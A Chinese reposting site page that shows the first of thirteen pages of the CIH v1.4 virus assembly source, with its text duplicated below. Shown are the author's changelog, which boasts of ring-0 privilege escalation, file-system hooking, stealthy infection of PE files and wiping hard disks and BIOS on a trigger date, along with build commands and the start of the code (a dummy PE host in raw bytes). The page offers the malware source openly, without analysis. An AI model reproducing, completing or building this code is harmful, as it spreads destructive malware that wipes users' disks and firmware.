| 订阅 | 在线投稿
分享
 
 
 

CIH v1.4源程序

来源:互联网网民  宽屏版  评论
2008-06-01 01:26:44

V1.4CIH

;****************************************************************************

; * The Virus Program Information *

; ****************************************************************************

; * *

; * Designer : CIH Source : TT99v of TATUNG in Taiwan *

; * Create Date : 04/26/1998 Now Version : 1.4 *

; * Modification Time : 05/31/1998 *

; * *

; * Turbo Assembler Version 4.0 : tasm /m cih *

; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *

; * *

; *==========================================================================*

; * Modification History *

; *==========================================================================*

; * v1.0 1. Create the Virus Program. *

; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *

; * 04/26/1998 3. Virus Code doesn't Reload into System. *

; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *

; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *

; * 6. When System Opens Existing PE File, the File will be *

; * Infected, and the File doesn't be Reinfected. *

; * 7. It is also Infected, even the File is Read-Only. *

; * 8. When the File is Infected, the Modification Date and Time *

; * of the File also don't be Changed. *

; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *

; * Previous FileSystemApiHook, it will Call the Function *

; * that the IFS Manager Would Normally Call to Implement *

; * this Particular I/O Request. *

; * 10. The Virus Size is only 656 Bytes. *

; *==========================================================================*

; * v1.1 1. Especially, the File that be Infected will not Increase *

; * it's Size... ^__^ *

; * 05/15/1998 2. Hook and Modify StrUCtured Exception Handing. *

; * When Exception Error Occurs, Our OS System should be in *

; * Windows NT. So My Cute Virus will not Continue to Run, *

; * it will Jmup to Original Application to Run. *

; * 3. Use Better Algorithm, Reduce Virus Code Size. *

; * 4. The Virus "Basic" Size is only 796 Bytes. *

; *==========================================================================*

; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *

; * 2. Modify the Bug of v1.1 *

; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *

; *==========================================================================*

; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *

; * So When Open WinZip Self-Extractor ==> Don't Infect it. *

; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *

; *==========================================================================*

; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *

; * 2. Change the Date of Killing Computers. *

; * 05/31/1998 3. Modify Virus Version Copyright. *

; * 4. The Virus "Basic" Size is 1019 Bytes. *

; ****************************************************************************

.586P

; ****************************************************************************

; * Original PE Executable File(Don't Modify this Section) *

; ****************************************************************************

OriginalAppEXE SEGMENT

FileHeader:

db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h

db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h

db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh

db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h

db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h

db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh

db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh

db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h

db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah

db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h

db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h

db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h

db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h

db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

dd 00000000h, VirusSize

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]

 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
V1.4 CIH ;**************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TT99v of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn't Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn't be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don't be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it's Size... ^__^ * ; * 05/15/1998 2. Hook and Modify StrUCtured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don't Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus "Basic" Size is 1019 Bytes. * ; **************************************************************************** .586P ; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
󰈣󰈤
 
 
 
>>返回首页<<
 
 热帖排行
 
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
©2005- 王朝网络 版权所有